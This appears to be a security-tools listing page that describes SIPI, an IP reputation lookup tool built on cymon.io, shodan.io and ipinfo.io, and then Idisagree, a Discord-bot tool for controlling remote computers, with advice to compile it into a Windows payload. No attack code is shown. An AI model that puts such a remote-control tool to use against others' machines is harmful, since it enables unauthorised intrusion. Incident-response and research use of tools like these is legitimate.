  • Report Delivery: The PDF report is emailed to the user as an attachment.

SIPI – Simple IP Information Tools for Reputation Data Analysis

SIPI is aimed at incident response teams and anyone who wants to know the behaviour of a "suspicious" IP address. The tool searches a set of open threat intelligence sources for reputation information about the IP: malware activity, malicious activity, blacklisting, spam and botnet activity.


Dependencies:
  • requests
  • shodan
Installation:
pip install requests && easy_install shodan
git clone <repository>
configure the API tokens in config.json
try: $> python sipi.py any_ip -A

SIPI Description

Simple IP Information Tool

sIPi is a free reconnaissance tool for obtaining IP address information from
many open sources: cymon.io | shodan.io | ipinfo.io

Julian J. Gonzalez Caracuel

It is a tool that analyzes an IP or IP list, obtaining as a result information about:

       - reputation / activity
       - exposure level
       - geolocation

Reputation / detection of the IP in blacklists according to the following categories:

 Source: cymon.io - Cymon is the largest open tracker of malware, phishing, botnets, spam, and more
   
           ['malware',
	   'botnet',
	   'spam',
	   'phishing',
	   'malicious activity',
	   'blacklist',
	   'dnsbl']

Exposure level:

Source: shodan.io - Shodan is the world's first search engine for Internet-connected devices.

Retrieves all the information Shodan holds about the IP address; depending on the level of access to the Shodan engine, more detailed data may be available (number of ports, banners, geolocation).

Geolocation:

Source: ipinfo.io
Retrieves basic information about the IP address, its geolocation and its ASN; rate limit 1000/day.

Installation Requirements

cymon.io  - requires an authentication token - registered user, rate limit: 1000/day
shodan.io - requires an authentication token - registered user, limit of 100 results, limited ports

The tokens are configured in the file config.json, which must be in the directory from which sipi.py is run (the API tokens for all services are set in a config.json file placed in the root directory).

Dependencies

requests

pip install requests

shodan

easy_install shodan

Idisagree – Control Remote Computers Using Discord Bot & Python 3

Idisagree is a tool to control remote computers using a Discord bot and Python 3. If your target is a Windows system, you may want to compile your payload; do this with py2exe or PyInstaller.

Prerequisites For Idisagree

  • Python 3.x
  • pip3
  • subprocess (Python 3 standard library)
  • discord (Python 3 library)


TESTED ON

  • Kali Linux – Rolling Edition
  • Linux Mint – 18.3 Sylvia
  • Ubuntu – 16.04.3 LTS
  • MacOS High Sierra

Clone

git clone https://github.com/UndeadSec/Idisagree.git

Running

cd Idisagree
sudo pip3 install -r requirements.txt
python3 Idisagree.py


Note : The use of this tool is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.